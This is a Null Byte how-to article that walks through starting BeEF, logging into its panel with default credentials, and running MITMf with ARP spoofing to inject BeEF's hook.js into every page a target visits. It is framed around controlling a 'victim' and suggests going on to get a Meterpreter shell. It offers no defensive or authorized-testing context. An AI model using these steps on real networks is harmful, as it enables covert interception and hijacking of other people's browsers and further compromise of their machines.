Wonder How ToGadget HacksNext RealityNull Byte
how to

How to Hook Web Browsers with MITMf and BeEF

Jun 22, 2015 04:11 AM
Jul 26, 2015 07:04 AM
635705169748674237.jpg

Do you remember the last time we used BeEF? Well, now we get to use it again, but this time with MITMf! We are going to auto-inject the hooking script into every webpage the victim visits!

Requirements

If you don't already have it, install MITMf via apt-get install mitmf. You might want to apt-get update first. If you want to, you can clone it from the Git repository (git clone https://github.com/byt3bl33d3r/MITMf), but I've had trouble with that version.

BeEF should already be installed in Kali/Back|Track.

Step 1: Start BeEF

Open a new terminal and type cd /usr/share/beef-xss/.

635705164873015040.jpg

As you can see, we have BeEF installed, and we can go ahead and run it by typing ./beef. You should get this output:

635705165980171031.jpg

Do you see the Hook URL? That's important. Remember or copy the URL provided.

Step 2: Open the Panel

Now you can open the BeEF web panel with the UI URL. Once presented with the login page, you should just be able to get in with the default credentials "beef" for both the username and password. Once inside the UI, you should have this screen:

635705167987200584.jpg

Step 3: Inject the Hook.js Script

Open up a new terminal. We'll be using MITMf to inject the hooking script. Use mitmf --spoof --arp -i --gateway --target --inject --js-url as the format.

  • --spoof loads the spoof plugin
  • --arp redirects ARP packets
  • -i specifies the interface to inject packets on
  • --gateway sets the IP of your router to redirect through
  • --target sets the target IP to inject the hook.js script
  • --inject loads the inject function
  • --js-url specifies the JavaScript code to inject

For instance, I use this command:

635705175005355143.jpg

Run the command and MITMf should start giving you some output.

635705176188264141.jpg

MITMf is telling us that it has successfully injected the hook.js script into the websites that the target visited.

Step 4: Back to BeEF

If we check our BeEF panel, you will see the hooked computer right on the Online Browsers tab.

635705177383321530.jpg

Remember in my previous XSS posts where I said the victim must stay on the webpage for you to have control of it? Guess what? You don't have to worry about that now! MITMf will continue injecting the script into every website the victim visits, so you'll never lose control!

Conclusion

Now we know what power lies within MITMf... we can do so much more. From there, you can continue trying to exploit the victim machine, and maybe get a Meterpreter prompt! Ah, the joy of MitM attacks...

NOTE: This only works with non-HSTS websites. You could try the --hsts function, but it might make things too slow and/or glitchy.

C|H of C3

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)
636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!